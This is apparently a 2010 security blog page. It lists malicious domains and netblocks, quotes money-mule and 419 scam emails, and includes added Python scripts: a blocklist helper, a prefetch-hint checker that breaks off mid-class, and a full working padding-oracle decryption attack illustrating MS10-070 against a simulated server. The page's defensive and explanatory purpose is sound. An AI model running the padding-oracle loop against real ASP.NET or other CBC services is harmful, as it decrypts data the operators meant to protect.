Onlymoviesporn.info
Porn-video-4u.info
Pornyardmovies.info
Videostreamporn.info
Moviesfreestar.info
Nanocloudcontroller.com
Iliked.org
Yougoodvideo.net
Shloesandrooneys.com
1200kb.net
Banfieldsbest.com
Btp-tags.com
Doit-4-u.com
In-ta.net
Media-share.org
Mwcdirect.com
Pixel-pie.com
Planetsoldat.com
Sainser.com
Wnizip.com
Dsfungssdfg.com
Sbgfdfsggf.com
Sportstickets.tv
Sufdngsg.com
Missing-codecs.com
Missing-codecs.net
Missing-codecs.org
Vidscentral.net
Consp.net
Thestability.com
Traffcity.com
Polytech-electronics.net
Blackmaven.in
Blueace.in
Whiteace.in
Whiteoso.in
Whitewizard.in
Globalcloudbackup.com
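The three netblock posts on this page (MD-ISP-MONITORING, Specialist Ltd and Donstroy Ltd) each end with the same advice: block the assigned range, or null route the listed domains. The script below is an added example of mine, not tooling from this blog. It takes the inetnum ranges and route objects exactly as they appear in the WHOIS output above, converts each "start - end" range to CIDR form, checks that the assigned range really sits inside the route the AS announces, builds the set of prefixes to block, and matches hostnames (including subdomains) against a domain list in the format the posts use. The Donstroy entry is marked retired because that post's UPDATE says the range has since been reassigned; a blocklist that is never reviewed is how innocent successors of a bad netblock end up blocked. `Netblock`, `NETBLOCKS`, `SAMPLE_DOMAINS` and the function names are my own; the addresses and domains are copied from the posts.

```python
"""Blocklist helper for the netblock posts above (added example, not the blog's own code)."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network, summarize_address_range


@dataclass(frozen=True)
class Netblock:
    name: str              # netname from the RIPE record
    inetnum: str           # "start - end", exactly as RIPE prints it
    route: str             # route object announced by the origin AS
    retired: bool = False  # post later updated: range reassigned, so do not block


# Values copied from the WHOIS output quoted in the three posts on this page.
NETBLOCKS = [
    Netblock("MD-ISP-MONITORING", "89.187.52.0 - 89.187.55.255", "89.187.32.0/19"),
    Netblock("Specialist-ISP-PI2", "194.28.112.0 - 194.28.115.255", "194.28.112.0/22"),
    Netblock("Donstroy-1", "194.8.250.0 - 194.8.251.255", "194.8.250.0/23", retired=True),
]

# A few entries from the MD-ISP-MONITORING domain list, in the post's own format.
SAMPLE_DOMAINS = """
Anonymousstats.com
Storageprotectorx.com
Msdefender2011.com
"""


def inetnum_to_cidrs(inetnum):
    """Turn a RIPE 'start - end' range into the minimal list of CIDR strings."""
    start, end = (ip_address(part.strip()) for part in inetnum.split("-"))
    return [str(net) for net in summarize_address_range(start, end)]


def range_within_route(block):
    """True when every CIDR of the assigned range lies inside the announced route.

    A mismatch here means the WHOIS record and the BGP announcement disagree,
    which is worth a second look before anything is blocked.
    """
    route = ip_network(block.route)
    return all(ip_network(c).subnet_of(route) for c in inetnum_to_cidrs(block.inetnum))


def active_blocks(whole_route=False):
    """CIDRs to block: the assigned ranges by default, or the whole announced routes.

    Retired entries are skipped so that a reassigned range drops out of the list.
    """
    prefixes = []
    for block in NETBLOCKS:
        if block.retired:
            continue
        prefixes.extend([block.route] if whole_route else inetnum_to_cidrs(block.inetnum))
    return prefixes


def ip_blocked(ip, whole_route=False):
    """Check a single address against the active block set."""
    addr = ip_address(ip)
    return any(addr in ip_network(prefix) for prefix in active_blocks(whole_route))


def domain_blocklist(listing):
    """Normalise a one-domain-per-line list (as printed in the posts) into a set."""
    return {line.strip().lower().rstrip(".") for line in listing.splitlines() if line.strip()}


def domain_blocked(host, blocklist):
    """A host is blocked if it, or any parent domain below the TLD, is listed."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels) - 1))


if __name__ == "__main__":
    for block in NETBLOCKS:
        status = "retired" if block.retired else "active"
        print(f"{block.name}: {inetnum_to_cidrs(block.inetnum)} in {block.route}: "
              f"{range_within_route(block)} ({status})")
    print("blocking:", active_blocks())
    print("89.187.53.1 blocked:", ip_blocked("89.187.53.1"))
    listed = domain_blocklist(SAMPLE_DOMAINS)
    print("www.anonymousstats.com blocked:", domain_blocked("www.anonymousstats.com", listed))
```

By default only the assigned /22 and /23 ranges are blocked, matching the ranges the posts name; pass `whole_route=True` to block the entire announced prefix (the /19 in the MD-ISP-MONITORING case), which is the heavier-handed reading of the same advice. The domain matcher deliberately stops short of matching a bare TLD so that a listing of `example.com` never blocks all of `.com`.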

Friday, 8 October 2010

position-nl.com fake job offer

A retread of this fake job offer, this time using the domain position-nl.com to solicit replies (there is also a position-gb.com and probably many other variants). Despite the claims, this job is most likely laundering stolen money and could lead to a criminal record.

Date: 8 October 2010 13:58
Subject: for CV #32
Building & Investment Company is pleased to offer you an excellent-paid
part-time vacancy for the position of Administrative Assistant(Representative).
You would work from the comfort of your home office or in our office, it would depend on your choice.

Our company is a large corporation that is building involved in a variety of activities
that include construction, realty management, investment sector, rental services etc.
Right now we are working on more than 10 objects around the world, primarily in Europe, United Kingdom and North America.
This is the ideal role for a highly organized and proactive administrator, looking to develop their career
with an established and successful company.
For the right candidate, there will be the opportunity to progress to Administrative Assistant(Representative).

Candidates for the job should possess excellent organizational skills as well as the ability to efficiently multi-task.
Ideal candidates have a strong focus on day-to-day operational excellence,
and a personal style that builds trust, and inspires loyalty.
Your duties will also include taking and entering orders,communicating with clients and partners, work with payments and information and creating mail shots.

Other duties of the Administrative Assistant(Representative) include, but are not limited to:
Incorporating effective priorities for the virtual office function
Administer day-to-day financial responsibilities for clients
Reporting online daily
Preparing brief summary reports, and weekly financial reports

To be considered for this position, you must have solid administration experience.
A good telephone manner is also essential.

Salary part-time: 5.000 euro/month plus bonuses.
Location: Holland

If you are interested, please reply to: natasha@position-nl.com with your latest CV.

Best regards,

Natasha Csereklye
Employment Manager

The domain was registered just today, and the registration details are probably fake:

Domain name:             POSITION-NL.COM
Name Server:             ns3.nic.ru
Name Server:             ns4.nic.ru
Name Server:             ns8.nic.ru
Creation Date:           2010.10.08

Status:                  DELEGATED

Registrant ID:           OQKDBB9-RU
Registrant Name:         Fabio A Murgia
Registrant Organization: Fabio A Murgia
Registrant Street1:      Via Giovanni, 183
Registrant City:         Cardano
Registrant Postal Code:  21010
Registrant Country:      IT

Administrative, Technical Contact
Contact ID:              OQKDBB9-RU
Contact Name:            Fabio A Murgia
Contact Organization:    Fabio A Murgia
Contact Street1:         Via Giovanni, 183
Contact City:            Cardano
Contact Postal Code:     21010
Contact Country:         IT
Contact Phone:           +39 0 331 732700
Contact E-mail:          fabrinoz@europe.com

Registrar:               Regional Network Information Center, JSC dba RU-CENTER

A Netherlands company, with Italian contact details on the domain.. which is registered in Russia? I think not.

Update: the domains uk-kbs.com and usa-kbs.com are also being used for the same fake job offer. Avoid.

Wednesday, 6 October 2010

F35 Fighters.. going cheap!

The F35 is an advanced US built fighter that the UK may or may not buy to put on aircraft carriers that it may or may not build. These things cost £70 million a pop and given the current budget constraints, it looks likely that some or all of the order will be cut.

Fear not.. there's a way of getting F35's cheaper than the list price.. simply Google 'em and you'll get an ad saying:
F 35 Fighters Cheap
Best Value for F 35 Fighters.
Find NexTag Sellers' Lowest Price!
www.NexTag.co.uk

Problem solved! Simply go to a shopping comparison site. Apart from the fact that NexTag don't have such things in their inventories (they do have a scale model though.. whoo!). Indeed, NexTag does run an awful lot of crappy ads for products that they don't have.. so why does Google tolerate them? And how much do you have to pay to advertise a £70m aircraft anyway?

Tuesday, 28 September 2010

MS10-070 - don't panic.. on second thoughts.. PANIC

Those of you who know Microsoft patch levels probably already treat "Important" patches with a shrug, because the really important ones are always "Critical". So when Microsoft does an out-of-band patch only rated as "Important" then there's something not right going on.

Well, MS10-070 is one such patch, and to be brutally brief it fixes a padding oracle in ASP.NET: the application's error responses differ depending on whether a tampered ciphertext decrypted to valid padding, and that single bit, collected over a few thousand requests, lets an attacker decrypt protected data such as ViewState and forms-authentication tickets and, by the same route, read files such as web.config off the server.. very bad news if you are running ASP.NET on IIS. Until the patch is on, the workaround Microsoft published is to map every error to one identical customErrors page, which takes the oracle away.
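To make that concrete, here is the attack loop run against a simulated oracle. This is an added example, not code from the original post or from Microsoft: the "server" is a local class that answers only whether padding was valid, and the block cipher is a toy Feistel construction on SHA-256 so the script runs on the standard library alone (an assumption; the attack never looks inside the cipher and works identically against AES-CBC).

```python
"""CBC padding-oracle decryption, the class of bug that MS10-070 fixes in ASP.NET.
Added example, not Microsoft's or the post's code. The toy Feistel cipher (an
assumption, so only the standard library is needed) is irrelevant to the attack."""
import hashlib
import os

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:  # 8-round balanced Feistel
    l, r = block[:8], block[8:]
    for i in range(8):
        l, r = r, _xor(l, _round(key, i, r))
    return r + l

def block_decrypt(key: bytes, block: bytes) -> bytes:
    r, l = block[:8], block[8:]
    for i in reversed(range(8)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return out

class PaddingOracle:
    """The server: the attacker never sees the key, only a yes/no on padding."""
    def __init__(self) -> None:
        self.key = os.urandom(16)
        self.queries = 0

    def encrypt(self, plaintext: bytes) -> bytes:
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(plaintext))

    def has_valid_padding(self, ciphertext: bytes) -> bool:
        # On the real bug this bit leaked via two distinguishable error pages.
        self.queries += 1
        try:
            unpad(cbc_decrypt(self.key, ciphertext[:BLOCK], ciphertext[BLOCK:]))
            return True
        except ValueError:
            return False

def padding_oracle_decrypt(oracle: PaddingOracle, ciphertext: bytes) -> bytes:
    """Recover the plaintext of IV||C1||...||Cn using only has_valid_padding()."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plaintext = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_key(cur), recovered from the last byte backwards
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos  # padding value forced onto positions pos..15
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ padv
                if not oracle.has_valid_padding(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:
                    # A last-byte hit could be \x02\x02 rather than \x01: disturb the
                    # byte to the left; a genuine \x01 padding stays valid.
                    forged[pos - 1] ^= 0xFF
                    if not oracle.has_valid_padding(bytes(forged) + cur):
                        continue
                inter[pos] = guess ^ padv
                break
        plaintext += _xor(bytes(inter), prev)  # P_i = D_key(C_i) xor C_(i-1)
    return unpad(plaintext)

if __name__ == "__main__":
    server = PaddingOracle()
    ct = server.encrypt(b"ViewState-like secret the attacker was never given")
    print(padding_oracle_decrypt(server, ct), "after", server.queries, "queries")
```

Each byte costs at most 256 queries, so three blocks of ciphertext fall in a little over 12,000 requests, and nothing about the key or the cipher is ever needed. That is also why the customErrors workaround matters: it removes the difference in responses that has_valid_padding() stands for, and without that bit the loop above cannot run.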

The ISC have more here, but be sure to read the comments.. because this one is looking like a complete fragging disaster zone..

Monday, 27 September 2010

"United Nation Bonded Warehouse Wales" scam

An obvious scam, but one that's really quite stupid:

From: AHMED SALEH ABDUL KHALEQ SLAEH ALAFIFI <info@khaliq.com>
Reply-To: khaliqalifi@iol.pt
Subject: ASSALAMUALAIKUM
 
From AHMED SALEH ABDUL KHALIQALIFI,.
United Nation Bonded Warehouse wales Branch.Office..........

What? Where? Actually, the UN does run warehouses, primarily for aid efforts (there's a list of jobs here) usually in areas suffering from disasters or war.. I don't think a Friday night in Swansea counts. But a bonded warehouse is not the same thing at all..

SALAM,

Dried sausage to you, too.

This is AHMED SALEH ABDUL KHALIQALIFI ,  Presently stationed with the possition of  assistant Manager as a trusted store-keeper herein United Nation Bonded WareHouse Wales Branch ..Office, Division in South West of  Great Brintain  . I will like to share some very vital information that would bring some good financial returns to us in just a few weeks or days depending on how fast we pursue the matter.I am seeking your assistance to evacuate unclaimed valuable property to your safe custody, as long as I can be assured that it will be safe in your care until i complete my service here

Why do I think that "trusted" is not the right word when you are basically offering me something that you have stolen? And Wales is in the "South West of  Great Brintain"? That's somebody who has a very badly spelled atlas that they don't really understand. Oh yes, and if you're in Wales, why is the sending IP address 110.159.18.181 in Malaysia?

This may not be the best medium to make this kind of contact because of the numerous scam offers transmitted through the Internet, but it is all I have access to for now.

Well, I'm glad you pointed that out because I totally believe that it's not a scam now. Tell you what, Wales is a couple of hours drive.. why don't I pop over with a van or something?

I will be very grateful if you can give me the opportunity to discuss this matter with you by assuring me that you will not use any part of it against me in anyway, I hope you understand my limitations here. I will await a mail from you.

What, like publishing your pathetic scamming effort onto teh interwebs?

Sincere Regards,

AHMED SALEH ABDUL KHALIQALIFI.

I think you need to double check the meaning of "sincere.."

Friday, 24 September 2010

position-gb.com / position-west.com fake job offer

Part of a long series of fake job offers, this one uses the domains position-gb.com and position-west.com to solicit replies. In this case "bank account operations" is money laundering, "transportation and logistics" is most likely a parcel reshipping scam and "private enterprise service" could be one of a number of criminal activities. Avoid.

Date: 24 September 2010 12:56
Subject: Re: CV 62

Greetings

I am a manager of the HR department of a large multinational company.

Our enterprise is connected with a great number of various activities, like:
-property
- bank account operations
- transportation and logistics
- private enterprise service
- etc.

We need employees in Europe:
- salary 2.500 euro + bonus
- 1 - 2 working hours per day

- free timetable


If our offer is interesting for you email us the required information: Chandra@position-gb.com
Name:
Surname:
City:
E-mail:
Telephone Number:



Note! We are searching Europeans only!

Wednesday, 22 September 2010

Evil network: VLine Ltd / VLINERU2-NET AS39150 (109.196.128.0/20)

A malware run in progress today using the arestyute.com domain made me look at VLine Ltd, a Moscow based host well-known for supporting criminal activities. The question is.. does VLine actually host any legitimate sites? The answer.. probably not.

An analysis of the netblock 109.196.128.0/20 (109.196.128.0 - 109.196.143.255) which forms AS39150 shows a collection of fake pharma sites, malware sites, fake banks and shipping companies, illegal downloads, fake passports and various other organised criminal activities.

A scan of the netblock using the MyWOT API shows a lot of very bad sites with a few rated "40" which shows that the MyWOT system has rated them automatically. You can see the ratings for all sites in the range in this CSV.

Google's Safe Browsing diagnostic for AS39150 is damning:

Safe Browsing
Diagnostic page for AS39150 (VLTELECOM)


What happened when Google visited sites hosted on this network?

    Of the 567 site(s) we tested on this network over the past 90 days, 33 site(s), including, for example, cgm.ru/, gigalife.info/, kastrade.ru/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-09-21, and the last time suspicious content was found was on 2010-09-21.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 109 site(s) on this network, including, for example, 109.196.134.0/, webserviceftp.ru/, webservicelupa.ru/, that appeared to function as intermediaries for the infection of 3232 other site(s) including, for example, madonnaonline.com.br/, veloplus.ch/, skihutonline.nl/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 165 site(s), including, for example, 109.196.134.0/, webserviceftp.ru/, webserivcessh.ru/, that infected 7766 other site(s), including, for example, madonnaonline.com.br/, homeandi.com/, ishrae.in/.

There's no reason not to block the entire range permanently, or if you want the individual domains check the CSV or copy and paste from below.

Zoma.ru
All4roof.ru
Minirank.ru
Chem-prom.ru
Dias-design.ru
Tile-world.ru
Airways-pro.ru
Mountain-air.ru
Office-ready.ru
Copyterra.ru
Home-building.ru
Vcam-security.ru
Find-furniture.ru
Air-free.ru
Office-interior.ru
Altioma.ru
Artellab.ru
Teplicy-volya.ru
Smirl.ru
Furniture-catalog.ru
Minipr.ru
Plastistrong.ru
Amalgamator.ru
Best-ceramics.ru
Vorota-avto.ru
Building-window.ru
Ccwater.ru
Smbuilding.ru
Home-interior.ru
Fertilize.ru
Light-breeze.ru
Sol-system.ru
Funny-holidays.ru
Furnbox.ru
Eco-bus.ru
Parquet4all.ru
Diesel-electric.ru
Sliding-gates.ru
Kamin-pro.ru
Gloomyandspy.com
Sultanpalase.com
Tdom1.ru
Aruspemedic.com
Atacmedic.com
Ballemed.com
Barblmedic.com
Bumedicine.com
Clayemed.com
Cupharmacy.info
Demornmedic.com
Dilimedic.com
Displimedic.com
Dns4life.com
Doctoraxon.com
Doctorpi.info
Doctorte.info
Draymedic.com
Drugstoremp.com
Gardmedic.com
Gatmedic.com
Ghostemed.com
Haemed.com
Hymedicine.com
Inlmedic.com
Inspidoctor.com
Izedrugs.com
Jestumed.com
Jolynbmedic.com
Kalsmed.com
Kedrugs.com
Lamilmed.com
Locumimed.com
Logdrugs.com
Lomedicine.com
Lumedicine.com
Mablmedic.com
Medalea.com
Medalee.com
Medalinve.com
Medaltype.com
Medalyssa.com
Mediardbi.com
Mediatear.com
Mediccu.com
Mediceday.com
Medicerly.com
Medicgant.com
Medicht.com
Medicineax.com
Medicinece.com
Medicineck.com
Medicineie.com
Medicineir.com
Medicinele.com
Medicinta.com
Mediclace.com
Mediclder.com
Medicmile.com
Medicnl.com
Medicorer.com
Medicsh.com
Medictu.com
Mediculio.com
Medicwe.com
Mediuling.com
Mediuro.com
Medulerac.com
Mestinmed.com
Nepharmacy.com
Nidrugs.com
Obamedic.com
Pharmacybp.com
Pharmacydg.com
Pharmacyec.com
Pharmacyha.com
Pharmacyji.com
Pharmacyna.com
Pharmacyou.com
Pharmacyri.com
Pharmacyta.com
Pharmacyty.com
Romannmed.com
Shormed.com
Site1dns.com
Staimed.com
Tommedic.com
Toucmedic.com
Towmedic.com
Unfmedic.com
Weemedic.com
Dnsupport4site.com
Frmedic.com
Golmedic.com
Grmedic.com
Agemedic.com
Balatmedic.com
Boulatomedic.com
Boumedic.com
Busbmmedic.com
Citelmedic.com
Clipmedic.com
Cofmedic.com
Cotmedic.com
Critrmed.com
Curragmed.com
Czkarmed.com
Drugsbr.com
Drugsdo.com
Drugsin.com
Drugski.com
Newnshome.com
Pharmacybw.com
Agammed.com
Alfmedic.com
Anodormed.com
Bapharmacy.com
Bromedic.com
Cartonlinesite.com
Caumedic.com
Doctorrnes.com
Doctorrteeny.com
Drugsab.com
Fiendemed.com
Sandpimed.com
Bilmedic.com
Socmdoctor.com
Anadoctor.com
Aprdoctor.com
Beldoctor.com
Cormedic.net
Cosadoctor.com
Cytdoctor.com
Decadoctor.com
Diadoctor.com
Doctorcitr.com
Doctordefu.com
Doctordnes.com
Doctorelig.com
Doctoresia.com
Doctorglos.com
Doctorlg.com
Doctorni.com
Doctoround.com
Doctorrman.com
Doctorsele.com
Doctorsour.com
Doctorsterca.com
Doctorstri.com
Doctorsust.com
Doctortelamy.com
Doctorusab.com
Doctorwnee.com
Dymedic.net
Esdoctor.com
Eurdoctor.com
Evemedic.net
Exdoctor.com
Faxedoctor.com
Flidoctor.com
Hodoctor.com
Idodoctor.com
Inamedic.net
Karldoctor.com
Lasdoctor.com
Lordoctor.com
Matmedic.net
Momedic.net
Pomedic.net
Prmedic.net
Prydoctor.com
Rodoctor.com
Sarmedic.net
Shimedic.net
Shmedic.net
Sigdoctor.com
Sumedic.net
Toudoctor.com
Tumedic.net
Wrmedic.net
Yeadoctor.com
Agefeskousavd.com
Baguntalput.com
Bandlobhepe.com
Doctoramro.com
Doctoraubr.com
Evercavsuv.com
Everuvdredsovg.com
Feremokerfeve.com
Kalkfallpoxeble.com
Kougsapelex.com
Kownamemavy.com
Laghtbukstap.com
Lekboxover.com
Lupharmacy.com
Mevbeforeday.com
Okworldadd.com
Perapsalfkvow.com
Pestendblask.com
Sallfapestpong.com
Seemalwayxame.com
Sekevak.com
Somekurvcar.com
Svowkooleskev.com
Swedoctor.com
Thousandbondepoff.com
Voecesoutree.com
Vowelvortevg.com
Wakerkesedurevg.com
Welebodyuvdred.com
Weskarereal.com
Wycerkaevsek.com
Yesqueskeovabove.com
Afmedicine.com
Ammedicine.com
Chmedicine.com
Medicalmoisdw.com
Medicalmoisdw1.com
Medicalmoisdw10.com
Medicalmoisdw2.com
Medicalmoisdw3.com
Medicalmoisdw4.com
Medicalmoisdw5.com
Medicalmoisdw6.com
Medicalmoisdw7.com
Medicalmoisdw8.com
Medicalmoisdw9.com
Medicineds.com
Medicinels.com
Medicinemi.com
Medicinena.com
Medicinend.com
Medicineoi.com
Am-way.ru
Sheathing.ru
Zakonoma.ru
Inmoble.ru
Crosswall.ru
Auto-wash.ru
Service-stroy.ru
Pure-air.ru
Window-tech.ru
Aeroventa.ru
Jackcond.ru
Ullte.com
Mp3fiesta.com
Setyupdates.com
Netspart.net
Myupdates.biz
Headboong.com
Myupdateswindows.biz
Bestandxast.com
Besternax.com
Erterzan.com
Joprestons.net
Ralaxanteras.com
Russian-post.net
Slikanddik.com
Trafallbest.com
Xalentarna.net
Zalevaka.com
Zaskupalt.com
Fdsdorgan.com
Freefdsvoip.com
Jastli.com
Qlepa.in
Infinitelivin.tw
Vviv.ru
Audo20s.in
Music9star.com
Nostalgictitation1.info
Pixelateder.info
Reducedilonion.info
Music9star.org
Video4gamle.org
Budulay.net
Ak2o.info
Bioloom.info
Cd3o.info
Dkm5.info
Drone2556yb5.info
Ek5k.info
Gambolsfhsw5.info
Jingoisticth65.info
Joculartuu7.info
L1nn.info
Largessff.info
Tjkd.info
Vaqp.info
Ymso.info
Globalstream.info
Xwealthglobal.com
Xwestprivate.com
Partnerandassist.com
Representativesuk.com
Tinygimme.info
Alm-career.com
Gdm247.com
Kadewsq.com
Kahlier.com
Myservster.com
Old-crash.com
Onlinesexytube.com
Vipnakurka.com
Asderbit.com
Ilaydiy.com
Ilovelasvegas.ru
X5vsm5.ru
Godfast.info
Haycorn.info
Lercuw.info
Winkum.info
Ukada.ru
Careerbuildjobs.com
Astraphs.com
Jarntauiuva91.com
Banktrustservice.com
Staffsecurecheck.com
Vseravnopidersii.net
Aatrgroup.com
Accentincolor.com
Prodesgroup.com
Kse-advertising.com
Sysport-1.com
Vlnet.ru
Intlos.org
Atomicc.com
Cern-a.com
Xbasex.com
Upslabels.cc
Securixp.com
Securixp.net
Addthiss.cn
Addthiss.net
Addthiss.org
Countinfo.com
Free-ns.org
Searchits.org
Searchnew.net
Top-analitics.com
Qweda.cn
Ameriprise-careers.eu
Piccinirealestate.eu
Sniping.biz
Your-usa-address.com
Gitrest.net
Utromesa.net
Yarostt.net
Absolutefinancegroup.com
C339.net
Freehost21.tw
Keller-services.com
Llwql.com
Parcelforwardingservice.com
Ticketalfa.com
Ticketbravo.us
Babaevo.com
Bestinsurancequotesinfo.com
Detoxhot.com
Freestarcraft2guide.info
Googlesecrets.biz
Guitar-beginners-guide.com
Insuranceproquotes.com
Pokeralpha.net
Agency-sunsea.com
Aslrr.com
Avelectronics.org
Buyfakepassport.cc
Buyfakepassports.com
Cargoex.info
Fakepassportsale.cc
Mbe-kerriere.com
Myhotlot.com
Oem-buy-soft.com
Oem-soft-buy.com
Raggaperfibra.net
Silverstarf.net
Whoismansheck.com
Yahoo-statistic.com
Geo-tour.org
Zeoxmark.com
Zeoxmark.net
Time-sync.net
Acfinc.eu
Banking-security.org
Lnterhome.biz
New-crash.com
Storetablets.net
Vipnakurka.net
Wallst-news-line.com
Sexyshowmovies.info
Sexyshowvideo.info
Allow-strike.ru
Allowstrike.ru
Antituta.ru
Awm-magazine.ru
Enterteiment-wizrd.ru
Enterteimentwizrd.ru
Julyrelax.ru
Magazineawm.ru
Magazineshare.ru
Nanovoice.ru
Protray.ru
Relax-july.ru
Relaxjuly.ru
Ros-tec.ru
Sensationworld.ru
Shareawm.ru
Sharks-devision.ru
Sharkstux.ru
Traypro.ru
Tuta-anti.ru
Tutaanti.ru
Tutavir.ru
Vir-tuta.ru
Viranti.ru
Virtuta.ru
Visitthermal.ru
Voice-nano.ru
Voicecontrol.ru
Wizrd-enterteiment.ru
Wizrdenterteiment.ru
Combicorm.com
Dertentazner.com
Notersils.com
Rerasterk.com
Westtrafficanser.com
Wrtumenter.com
Arestyute.com
Rtttins.com
Trrrasret.com
Ukklomk.com
Bibblea.com
Trawqe.com
Uttere.com
Yterast.com
Capitalmarktservice.com
Dangerousteens.com
Mrxbase.com
Sweetpornobabes.com
Sweettiny.com
The-snake-jewellery.com
Tight-slits.com
Tinysweet.com
Youngsweat.com
Zedexpost.com
Gkkotre.com
Letyasheypohodkoymoraleswtf.info
Mindwor.com
Promojoyswif.net
Tristan-express.com
Vain-and-ryan.com
Vain-ryan.com
Weslisnaps.info
Samsclearancerainbow.com
Samsclearancewebers670.com
Samsclubclearance.cc
7crack.com
7newmails.com.ua
9ladiesmails.com.ua
Abruzzonelblues.com
Alina-sp.com.ua
Alinamails-jl.com.ua
Allmails-1u.com.ua
Anastasia-mails7.com.ua
Annamail-jl.com.ua
Ckinter.ru
Contacts4u-sp.com.ua
Crack-info.com
Crack-key.com
Crack-keygen-serial.com
Crack-news.com
Crack-software.com
Crack-warez.com
Crackblogs.com
Cracknews.info
Dates-eva.com.ua
Download-url.com
Drcrack.com
Evadates.com.ua
Evamass-pa.com.ua
Evanews-pa.com.ua
Evanotes.com.ua
Evatease.com.ua
Free-key.net
Freecrack.net
Girlfriend-re.com
Julia-mails.com.ua
Julia-mails7.com.ua
Julia-sp.com.ua
Katerina-sp.com.ua
Ladies-re.com
Mails4u-pa.com.ua
Maria-mails7.com.ua
Marina-sp.com.ua
Matches-re.com
Messages4u-sp.com.ua
Mila-sp.com.ua
Nadya-sp.com.ua
Notes4u-pa.com.ua
Olganotes.com.ua
Search-crack.com
Serials-keys.com
Teaseville-sp.com.ua
Thecrack.name
Warez-crack.com
Wincrack.info
Yeva4u-pa.com.ua
Search-841.com

Tuesday, 21 September 2010

FirearmsForYou.com and the Chinese connection

Automated link exchange requests are annoying, but usually easily dealt with by binning them. This idiot decided to send me the same spam 25 times..

From: James <linkmanager@firearmsforyou.com>
Subject: Link Exchange Proposal from FirearmsForYou.com

Hello Webmaster,

I am seeking out possible link partners to offer as a resource to our site's visitors. I've found your website http://www.dynamoo.com and its information and advice to be a great service and I am interested in exchanging links with you.

Please consider adding our link to your site on the following page:
http://www.dynamoo.com/orange/links.htm

Our linking details:

Anchor text: Guns Online

URL: http://www.firearmsforyou.com/

Description: Buy guns online from a trusted source. Firearms For You has the largest selection of firearms and accessories.

[snip]

Guns Online Buy guns online from a trusted source. Firearms For You has the largest selection of firearms and accessories.

Your link will be added in the best category here http://www.firearmsforyou.com/resources/index.html

Please send me your site details and I will add your link as soon as possible.

I hope for an early and positive response from you.

Best Regards,
James
FirearmsForYou.com
9831 E. Bell Road Suite 110
Scottsdale, AZ 85260

Note: If you would like not to receive any further communications from me, please paste this link into your browser: http://www.firearmsforyou.com/resources/unsubscribe.html?id=[snip]

Or simply respond to this email with Remove as the subject.

OK, he's an idiot who sells assault rifles, but Scottsdale is over 5000 miles away, so I feel quite safe calling "James" (if that is his name) an idiot.

Now, if Americans want to take pot shots at each other with military grade weapons then it is up to them, pro-gun people will argue that it's their constitutional right to bear arms as American citizens.

But dig a little deeper, and these emails originate from 202.181.174.45 in Hong Kong.. which is part of China.. who are Communists, remember? It all looks a bit un-American to me..

Monday, 20 September 2010

The incredibly dangerous world of browser prefetch

Perhaps I've been living under a rock, but this apparently has been a suicidally stupid feature built into Firefox for some time, though it seems to be seldom used.

It started with a short spam apparently advertising a fairly well known black hat forum for hackers and illicit trades. It's not the sort of place that would choose to advertise itself though (it is strictly by invitation only), so quite possibly this is a Joe Job by one set of black hatters against another.

Now I guess that many recipients will have done the same thing, and typed the name of the site into Google to find out about it.. under the assumption that they'll find something that doesn't involve visiting the spamvertised site itself. But if you're using Firefox (and this possibly applies to IE8 and IE9 too), then the following message pops up:


Secure Connection Failed

-----------.com:443 uses an invalid security certificate.

The certificate is not trusted because it is self signed.

(Error code: sec_error_untrusted_issuer)

It could be a problem with the server's configuration or it could be someone trying to impersonate the server.

If you have connected to this server successfully in the past the error may be temporary and you can try again later.

Right at this point I kicked myself because I thought I had accidentally clicked through. But no... the certificate error was showing on the Google search page and I hadn't clicked through at all.. so why was Google trying to load the page and showing the HTTPS error because of the invalid certificate?

The answer lies in prefetch: Google's results page carries a prefetch hint for the top result, and Firefox's default configuration honours it, so the browser fetched content from the bad site just because I had Googled for something.

Link prefetching (and how to turn it off) is explained in this FAQ or this HOWTO guide.. if you are using a Mozilla based browser then go and turn it off NOW by going into about:config and setting network.prefetch-next to false.
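As an added example (not from the original post), here is the check I would run on a page before trusting it not to phone home on my behalf: it lists every link hint a browser may act on without a click and flags those pointing at a host other than the page's own. Standard library only; the sample page and every hostname in it are constructed for the demonstration, and the rel values beyond prefetch and next are later browser hints included for completeness.

```python
"""Which URLs does a page ask the browser to fetch before the user clicks?
Added example, not part of the original post. Firefox's network.prefetch-next
acts on <link rel="prefetch"> and <link rel="next">; prerender and dns-prefetch
are later hints with the same effect of a request the user never made."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

PREFETCH_RELS = {"prefetch", "next", "prerender", "dns-prefetch"}


class PrefetchHintParser(HTMLParser):
    def __init__(self, page_url: str) -> None:
        super().__init__()
        self.page_url = page_url
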